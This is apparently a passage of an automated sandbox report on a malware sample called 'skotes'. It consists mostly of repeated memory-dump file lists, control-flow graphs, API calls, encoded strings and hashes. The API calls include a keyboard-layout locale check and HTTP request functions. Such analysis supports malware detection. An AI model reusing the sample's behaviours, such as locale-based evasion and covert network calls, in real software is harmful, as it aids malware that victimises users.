                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSendSleep
                                                                                                                                                                • String ID: 8HJUeIfzLo==$8HJUeMD Lq5=$RE1NXF==$hV$invalid stoi argument$stoi argument out of range
                                                                                                                                                                • API String ID: 2167506142-1683200280
                                                                                                                                                                • Opcode ID: d173517952c321dbbe3a928f94aadbc04c9990b8733097acb7dccdac9c72504a
                                                                                                                                                                • Instruction ID: fd8ca7ace5a87a3887786c262f02f8bcab65542fc6f1f6b7edf2bdeec27d36ce
                                                                                                                                                                • Opcode Fuzzy Hash: d173517952c321dbbe3a928f94aadbc04c9990b8733097acb7dccdac9c72504a
                                                                                                                                                                • Instruction Fuzzy Hash: 11B1E4B05001189BDB24EF28CC85BADBBE5EF45304F5041E9F508972E2DB719AC4CFA8

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1686 b86020-b8619d call b9e150 call b980c0 * 5 RegOpenKeyExA 1699 b864b1-b864ba 1686->1699 1700 b861a3-b86233 call bb40f0 1686->1700 1701 b864bc-b864c7 1699->1701 1702 b864e7-b864f0 1699->1702 1730 b86239-b8623d 1700->1730 1731 b8649f-b864ab 1700->1731 1704 b864c9-b864d7 1701->1704 1705 b864dd-b864e4 call b9d663 1701->1705 1706 b8651d-b86526 1702->1706 1707 b864f2-b864fd 1702->1707 1704->1705 1709 b865d7-b865df call bb6c6a 1704->1709 1705->1702 1713 b86528-b86533 1706->1713 1714 b86553-b8655c 1706->1714 1711 b864ff-b8650d 1707->1711 1712 b86513-b8651a call b9d663 1707->1712 1711->1709 1711->1712 1712->1706 1721 b86549-b86550 call b9d663 1713->1721 1722 b86535-b86543 1713->1722 1716 b8655e-b86569 1714->1716 1717 b86585-b8658e 1714->1717 1725 b8657b-b86582 call b9d663 1716->1725 1726 b8656b-b86579 1716->1726 1727 b865bb-b865d6 call b9cff1 1717->1727 1728 b86590-b8659f 1717->1728 1721->1714 1722->1709 1722->1721 1725->1717 1726->1709 1726->1725 1734 b865b1-b865b8 call b9d663 1728->1734 1735 b865a1-b865af 1728->1735 1737 b86499 1730->1737 1738 b86243-b86279 RegEnumValueA 1730->1738 1731->1699 1734->1727 1735->1709 1735->1734 1737->1731 1740 b8627f-b8629e 1738->1740 1741 b86486-b8648d 1738->1741 1745 b862a0-b862a5 1740->1745 1741->1738 1746 b86493 1741->1746 1745->1745 1748 b862a7-b862fb call b980c0 call b97a00 * 2 call b85d50 1745->1748 1746->1737 1748->1741
                                                                                                                                                                APIs
                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 00B8617D
                                                                                                                                                                • RegEnumValueA.KERNEL32(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 00B86271
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EnumOpenValue
                                                                                                                                                                • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                                                • API String ID: 2571532894-3963862150
                                                                                                                                                                • Opcode ID: 2652c2f5dea2a82901307eab5d956810f716e29e5bd7a3b5b65df9c50e3c6ee3
                                                                                                                                                                • Instruction ID: bf413d33b49012928cfcfefde7e91ecd513d696cc0b009c03c05fc318d7d6bf2
                                                                                                                                                                • Opcode Fuzzy Hash: 2652c2f5dea2a82901307eab5d956810f716e29e5bd7a3b5b65df9c50e3c6ee3
                                                                                                                                                                • Instruction Fuzzy Hash: 1BB1AE719002689BDB24DB54CC85BDEB7B9AF15300F5402E9E108E72A1DB74AFA8CF94

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1826 b87d30-b87db2 call bb40f0 1830 b87db8-b87de0 call b97a00 call b85c10 1826->1830 1831 b88356-b88373 call b9cff1 1826->1831 1838 b87de2 1830->1838 1839 b87de4-b87e06 call b97a00 call b85c10 1830->1839 1838->1839 1844 b87e08 1839->1844 1845 b87e0a-b87e23 1839->1845 1844->1845 1848 b87e54-b87e7f 1845->1848 1849 b87e25-b87e34 1845->1849 1850 b87eb0-b87ed1 1848->1850 1851 b87e81-b87e90 1848->1851 1852 b87e4a-b87e51 call b9d663 1849->1852 1853 b87e36-b87e44 1849->1853 1858 b87ed3-b87ed5 GetNativeSystemInfo 1850->1858 1859 b87ed7-b87edc 1850->1859 1856 b87e92-b87ea0 1851->1856 1857 b87ea6-b87ead call b9d663 1851->1857 1852->1848 1853->1852 1854 b88374 call bb6c6a 1853->1854 1864 b88379-b8837f call bb6c6a 1854->1864 1856->1854 1856->1857 1857->1850 1863 b87edd-b87ee6 1858->1863 1859->1863 1867 b87ee8-b87eef 1863->1867 1868 b87f04-b87f07 1863->1868 1869 b88351 1867->1869 1870 b87ef5-b87eff 1867->1870 1871 b87f0d-b87f16 1868->1871 1872 b882f7-b882fa 1868->1872 1869->1831 1874 b8834c 1870->1874 1875 b87f18-b87f24 1871->1875 1876 b87f29-b87f2c 1871->1876 1872->1869 1877 b882fc-b88305 1872->1877 1874->1869 1875->1874 1879 b87f32-b87f39 1876->1879 1880 b882d4-b882d6 1876->1880 1881 b8832c-b8832f 1877->1881 1882 b88307-b8830b 1877->1882 1885 b88019-b882bd call b97a00 call b85c10 call b97a00 call b85c10 call b85d50 call b97a00 call b85c10 call b85730 call b97a00 call b85c10 call b97a00 call b85c10 call b85d50 call b97a00 call b85c10 call b85730 call b97a00 call b85c10 call b97a00 call b85c10 call b85d50 call b97a00 call b85c10 call b85730 call b97a00 call b85c10 call b97a00 call b85c10 call b85d50 call b97a00 call b85c10 call b85730 1879->1885 1886 b87f3f-b87f9b call b97a00 call b85c10 call b97a00 call b85c10 call b85d50 1879->1886 1883 b882d8-b882e2 1880->1883 1884 b882e4-b882e7 1880->1884 1889 b8833d-b88349 1881->1889 1890 b88331-b8833b 1881->1890 1887 b8830d-b88312 1882->1887 1888 b88320-b8832a 1882->1888 1883->1874 1884->1869 1891 b882e9-b882f5 1884->1891 1926 b882c3-b882cc 1885->1926 1911 b87fa0-b87fa7 1886->1911 1887->1888 1893 b88314-b8831e 1887->1893 1888->1869 1889->1874 1890->1869 1891->1874 1893->1869 1913 b87fa9 1911->1913 1914 b87fab-b87fcb call bb8bbe 1911->1914 1913->1914 1920 b87fcd-b87fdc 1914->1920 1921 b88002-b88004 1914->1921 1923 b87fde-b87fec 1920->1923 1924 b87ff2-b87fff call b9d663 1920->1924 1925 b8800a-b88014 1921->1925 1921->1926 1923->1864 1923->1924 1924->1921 1925->1926 1926->1872 1930 b882ce 1926->1930 1930->1880
                                                                                                                                                                APIs
                                                                                                                                                                • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B87ED3
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394608742.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394925292.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395909524.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3395978087.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397711898.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397793080.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397852533.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397923271.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3397985271.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398039211.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398087705.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398142318.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398193052.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398251077.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398309435.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398402608.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398457685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398507275.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398560517.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398615587.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398686397.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398760073.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398823301.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398883662.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3398957010.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399019622.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399080155.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399220623.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399282452.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399329890.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399380274.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399427278.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399474378.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399516797.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3399569697.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_6_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InfoNativeSystem
                                                                                                                                                                • String ID: JjsrPl==$JjsrQV==$JjssOl==$JjssPV==
                                                                                                                                                                • API String ID: 1721193555-3123340372
                                                                                                                                                                • Opcode ID: 556d9a11f77123b8ba6d5d9f8d8943caab1898acf5c3640974a5edab3dc9bf6b
                                                                                                                                                                • Instruction ID: ad96d40138f26946584c0b6249f4a227d5b54063a1d315c59cfefd02815cabe6
                                                                                                                                                                • Opcode Fuzzy Hash: 556d9a11f77123b8ba6d5d9f8d8943caab1898acf5c3640974a5edab3dc9bf6b
                                                                                                                                                                • Instruction Fuzzy Hash: F8E1C470E006449BDB25BB688C4B79D7BE1AB42724F9442D8E4156B3E2DF758E80CBC6

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1980 bc1abc-bc1aec call bc180a 1983 bc1aee-bc1af9 call bb75e3 1980->1983 1984 bc1b07-bc1b13 call bbbf3a 1980->1984 1989 bc1afb-bc1b02 call bb75f6 1983->1989 1990 bc1b2c-bc1b75 call bc1775 1984->1990 1991 bc1b15-bc1b2a call bb75e3 call bb75f6 1984->1991 2000 bc1de1-bc1de5 1989->2000 1998 bc1b77-bc1b80 1990->1998 1999 bc1be2-bc1beb GetFileType 1990->1999 1991->1989 2002 bc1bb7-bc1bdd call bb75c0 1998->2002 2003 bc1b82-bc1b86 1998->2003 2004 bc1bed-bc1c1e call bb75c0 1999->2004 2005 bc1c34-bc1c37 1999->2005 2002->1989 2003->2002 2007 bc1b88-bc1bb5 call bc1775 2003->2007 2004->1989 2027 bc1c24-bc1c2f call bb75f6 2004->2027 2008 bc1c39-bc1c3e 2005->2008 2009 bc1c40-bc1c46 2005->2009 2007->1999 2007->2002 2012 bc1c4a-bc1c98 call bbbe85 2008->2012 2009->2012 2013 bc1c48 2009->2013 2022 bc1c9a-bc1ca6 call bc1984 2012->2022 2023 bc1cb7-bc1cdf call bc1522 2012->2023 2013->2012 2022->2023 2030 bc1ca8 2022->2030 2032 bc1ce4-bc1d25 2023->2032 2033 bc1ce1-bc1ce2 2023->2033 2027->1989 2034 bc1caa-bc1cb2 call bbaf48 2030->2034 2036 bc1d46-bc1d54 2032->2036 2037 bc1d27-bc1d2b 2032->2037 2033->2034 2034->2000 2040 bc1ddf 2036->2040 2041 bc1d5a-bc1d5e 2036->2041 2037->2036 2039 bc1d2d-bc1d41 2037->2039 2039->2036 2040->2000 2041->2040 2043 bc1d60-bc1d93 call bc1775 2041->2043 2047 bc1d95-bc1dc1 call bb75c0 call bbc04d 2043->2047 2048 bc1dc7-bc1ddb 2043->2048 2047->2048 2048->2040
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 00BC1775: CreateFileW.KERNEL32(00000000,00000000,?,00BC1B65,?,?,00000000,?,00BC1B65,00000000,0000000C), ref: 00BC1792
                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00BC1BD7
                                                                                                                                                                • GetFileType.KERNEL32(00000000), ref: 00BC1BE3
                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00BC1BF6
                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00BC1D9C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000006.00000002.3391709308.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000006.00000002.3391127329.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3391709308.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392040119.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392143183.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3392255845.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393813092.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393871645.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3393943100.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394423465.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394489705.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000006.00000002.3394550960.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
